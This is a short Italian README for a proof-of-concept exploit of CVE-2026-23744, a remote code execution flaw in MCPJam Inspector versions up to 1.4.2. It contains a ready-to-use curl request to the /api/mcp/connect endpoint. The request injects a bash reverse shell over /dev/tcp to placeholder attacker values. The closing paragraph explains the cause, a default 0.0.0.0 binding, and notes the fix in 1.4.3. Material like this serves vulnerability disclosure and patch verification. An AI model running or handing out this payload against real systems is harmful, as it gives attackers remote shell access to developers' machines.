
Exploit proof-of-concept per CVE-2026-23744, una vulnerabilità di esecuzione remota di codice in MCPJam Inspector. Dimostra l'RCE tramite una richiesta HTTP appositamente realizzata all'endpoint /api/mcp/connect con payload di reverse shell.
PoC sulla vulnerabilità in MCP Server.
Automatizzato per la parte POST con il corpo corretto.
/api/mcp/connect
curl http://evil.com:6274/api/mcp/connect --header "Content-Type: application/json" --data '{"serverConfig":{"command":"bash","args":["-c","bash -i >& /dev/tcp/TUIP/TUPUERTO 0>&1"],"env":{}},"serverId":"pruebaxd"}'
MCPJam Inspector è la prima piattaforma di sviluppo locale per server MCP. Le versioni 1.4.2 e precedenti sono soggette alla vulnerabilità di esecuzione remota di codice (RCE), che consente a un attaccante di inviare una richiesta HTTP appositamente predisposta che attiva l'installazione di un server MCP, generando RCE. Poiché l'ispettore MCPJam ascolta per impostazione predefinita su 0.0.0.0 invece che su 127.0.0.1, un attaccante può attivare la RCE da remoto tramite una semplice richiesta HTTP. La versione 1.4.3 contiene una patch.